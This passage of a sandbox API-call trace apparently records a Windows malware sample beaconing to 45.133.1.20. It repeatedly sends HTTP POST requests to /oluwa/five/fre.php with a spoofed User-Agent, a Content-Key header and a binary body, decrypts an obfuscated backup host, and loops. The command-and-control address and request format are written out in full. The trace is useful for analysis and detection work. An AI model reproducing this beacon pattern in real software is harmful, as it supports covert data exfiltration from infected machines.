Flags=0x0, Size=0x20) returned 0x6b3670 [0165.009] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b9bb8*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be7d8*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0165.009] GetProcessHeap () returned 0x6a0000 [0165.009] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6bab40 [0165.009] socket (af=2, type=1, protocol=6) returned 0x2ec [0165.073] connect (s=0x2ec, name=0x6be7d8*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0165.102] FreeAddrInfoW (pAddrInfo=0x6b9bb8*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be7d8*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0165.102] GetProcessHeap () returned 0x6a0000 [0165.102] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0165.102] GetProcessHeap () returned 0x6a0000 [0165.102] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0165.103] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0165.103] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0165.103] GetProcessHeap () returned 0x6a0000 [0165.103] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bbc60 [0165.104] GetProcessHeap () returned 0x6a0000 [0165.104] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0165.104] GetProcessHeap () returned 0x6a0000 [0165.105] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4a30 [0165.105] GetProcessHeap () returned 0x6a0000 [0165.105] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0165.106] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0165.107] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0165.107] GetProcessHeap () returned 0x6a0000 [0165.107] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bbd20 [0165.107] GetProcessHeap () returned 0x6a0000 [0165.107] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0165.108] send (s=0x2ec, buf=0x6bbd20*, len=242, flags=0) returned 242 [0165.108] send (s=0x2ec, buf=0x6bb998*, len=159, flags=0) returned 159 [0165.108] GetProcessHeap () returned 0x6a0000 [0165.108] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6bf370 [0165.108] recv (in: s=0x2ec, buf=0x6bf370, len=4048, flags=0 | out: buf=0x6bf370*) returned 204 [0165.190] GetProcessHeap () returned 0x6a0000 [0165.190] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbd20 | out: hHeap=0x6a0000) returned 1 [0165.190] GetProcessHeap () returned 0x6a0000 [0165.190] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0165.190] GetProcessHeap () returned 0x6a0000 [0165.191] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0165.191] GetProcessHeap () returned 0x6a0000 [0165.191] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0165.191] closesocket (s=0x2ec) returned 0 [0165.192] GetProcessHeap () returned 0x6a0000 [0165.192] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bab40 | out: hHeap=0x6a0000) returned 1 [0165.192] GetProcessHeap () returned 0x6a0000 [0165.192] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0165.192] GetProcessHeap () returned 0x6a0000 [0165.192] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0165.193] GetProcessHeap () returned 0x6a0000 [0165.193] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0165.193] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6bf370, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xe20) returned 0x2ec [0165.196] Sleep (dwMilliseconds=0xea60) [0165.198] GetProcessHeap () returned 0x6a0000 [0165.198] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0165.199] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0165.200] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0165.211] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0165.211] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beb90) returned 1 [0165.221] GetProcessHeap () returned 0x6a0000 [0165.221] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0165.221] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0165.222] CryptImportKey (in: hProv=0x6beb90, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad560) returned 1 [0165.223] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0165.223] CryptSetKeyParam (hKey=0x6ad560, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0165.224] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0165.224] CryptSetKeyParam (hKey=0x6ad560, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0165.224] GetProcessHeap () returned 0x6a0000 [0165.225] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0165.226] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0165.226] CryptDecrypt (in: hKey=0x6ad560, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0165.227] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0165.227] CryptDestroyKey (hKey=0x6ad560) returned 1 [0165.228] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0165.229] CryptReleaseContext (hProv=0x6beb90, dwFlags=0x0) returned 1 [0165.229] GetProcessHeap () returned 0x6a0000 [0165.229] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0165.243] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0165.243] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0165.244] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0165.244] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0165.245] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0165.245] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0165.246] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0165.248] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0165.248] GetProcessHeap () returned 0x6a0000 [0165.248] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0165.249] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0165.249] GetProcessHeap () returned 0x6a0000 [0165.250] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0165.250] GetProcessHeap () returned 0x6a0000 [0165.250] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0165.250] GetProcessHeap () returned 0x6a0000 [0165.251] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0165.251] GetProcessHeap () returned 0x6a0000 [0165.251] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0165.252] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0165.252] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0165.258] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0165.259] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf058) returned 1 [0165.266] GetProcessHeap () returned 0x6a0000 [0165.266] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0165.267] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0165.267] CryptImportKey (in: hProv=0x6bf058, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0165.268] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0165.269] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0165.269] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0165.270] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0165.270] GetProcessHeap () returned 0x6a0000 [0165.270] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0165.271] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0165.271] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0165.272] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0165.273] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0165.274] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0165.274] CryptReleaseContext (hProv=0x6bf058, dwFlags=0x0) returned 1 [0165.274] GetProcessHeap () returned 0x6a0000 [0165.274] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0165.275] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0165.275] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0165.276] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0165.276] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0165.277] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0165.278] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0165.278] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0165.279] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0165.279] GetProcessHeap () returned 0x6a0000 [0165.279] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0165.279] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b9e60*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be880*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0165.279] GetProcessHeap () returned 0x6a0000 [0165.279] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baaf0 [0165.279] socket (af=2, type=1, protocol=6) returned 0x2f0 [0165.280] connect (s=0x2f0, name=0x6be880*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0165.308] FreeAddrInfoW (pAddrInfo=0x6b9e60*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be880*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0165.308] GetProcessHeap () returned 0x6a0000 [0165.308] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0165.308] GetProcessHeap () returned 0x6a0000 [0165.308] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0165.309] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0165.310] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0165.310] GetProcessHeap () returned 0x6a0000 [0165.310] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bbc60 [0165.310] GetProcessHeap () returned 0x6a0000 [0165.311] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0165.311] GetProcessHeap () returned 0x6a0000 [0165.311] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4a30 [0165.311] GetProcessHeap () returned 0x6a0000 [0165.311] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0165.312] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0165.313] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0165.313] GetProcessHeap () returned 0x6a0000 [0165.313] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bbd20 [0165.313] GetProcessHeap () returned 0x6a0000 [0165.314] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0165.314] send (s=0x2f0, buf=0x6bbd20*, len=242, flags=0) returned 242 [0165.315] send (s=0x2f0, buf=0x6bb998*, len=159, flags=0) returned 159 [0165.315] GetProcessHeap () returned 0x6a0000 [0165.315] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6bf370 [0165.315] recv (in: s=0x2f0, buf=0x6bf370, len=4048, flags=0 | out: buf=0x6bf370*) returned 204 [0165.388] GetProcessHeap () returned 0x6a0000 [0165.388] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbd20 | out: hHeap=0x6a0000) returned 1 [0165.389] GetProcessHeap () returned 0x6a0000 [0165.389] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0165.389] GetProcessHeap () returned 0x6a0000 [0165.389] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0165.389] GetProcessHeap () returned 0x6a0000 [0165.391] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0165.391] closesocket (s=0x2f0) returned 0 [0165.391] GetProcessHeap () returned 0x6a0000 [0165.391] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baaf0 | out: hHeap=0x6a0000) returned 1 [0165.391] GetProcessHeap () returned 0x6a0000 [0165.392] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0165.392] GetProcessHeap () returned 0x6a0000 [0165.392] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0165.392] GetProcessHeap () returned 0x6a0000 [0165.392] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0165.393] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6bf370, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xc84) returned 0x2f0 [0165.395] Sleep (dwMilliseconds=0xea60) [0165.397] GetProcessHeap () returned 0x6a0000 [0165.397] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0165.398] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0165.398] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0165.417] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0165.418] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf168) returned 1 [0165.427] GetProcessHeap () returned 0x6a0000 [0165.427] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b9a28 [0165.428] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0165.429] CryptImportKey (in: hProv=0x6bf168, pbData=0x6b9a28, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0165.430] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0165.430] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0165.431] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0165.432] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0165.432] GetProcessHeap () returned 0x6a0000 [0165.432] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9a28 | out: hHeap=0x6a0000) returned 1 [0165.440] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0165.441] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0165.461] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0165.462] CryptDestroyKey (hKey=0x6ad020) returned 1 [0165.462] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0165.463] CryptReleaseContext (hProv=0x6bf168, dwFlags=0x0) returned 1 [0165.463] GetProcessHeap () returned 0x6a0000 [0165.463] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0165.464] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0165.464] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0165.465] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0165.466] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0165.466] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0165.467] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0165.470] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0165.470] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0165.470] GetProcessHeap () returned 0x6a0000 [0165.470] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0165.471] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0165.471] GetProcessHeap () returned 0x6a0000 [0165.471] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0165.471] GetProcessHeap () returned 0x6a0000 [0165.472] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0165.472] GetProcessHeap () returned 0x6a0000 [0165.472] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0165.472] GetProcessHeap () returned 0x6a0000 [0165.472] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0165.473] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0165.474] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0165.483] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0165.484] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bed28) returned 1 [0165.495] GetProcessHeap () returned 0x6a0000 [0165.495] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0165.495] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0165.496] CryptImportKey (in: hProv=0x6bed28, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0165.497] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0165.497] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0165.498] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0165.499] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0165.499] GetProcessHeap () returned 0x6a0000 [0165.499] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0165.500] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0165.503] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0165.504] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0165.504] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0165.505] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0165.505] CryptReleaseContext (hProv=0x6bed28, dwFlags=0x0) returned 1 [0165.505] GetProcessHeap () returned 0x6a0000 [0165.506] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0165.506] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0165.507] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0165.508] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0165.508] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0165.509] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0165.509] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0165.510] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0165.511] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0165.511] GetProcessHeap () returned 0x6a0000 [0165.511] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0165.511] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b9b40*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be940*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0165.511] GetProcessHeap () returned 0x6a0000 [0165.511] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa00 [0165.511] socket (af=2, type=1, protocol=6) returned 0x2f4 [0165.512] connect (s=0x2f4, name=0x6be940*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 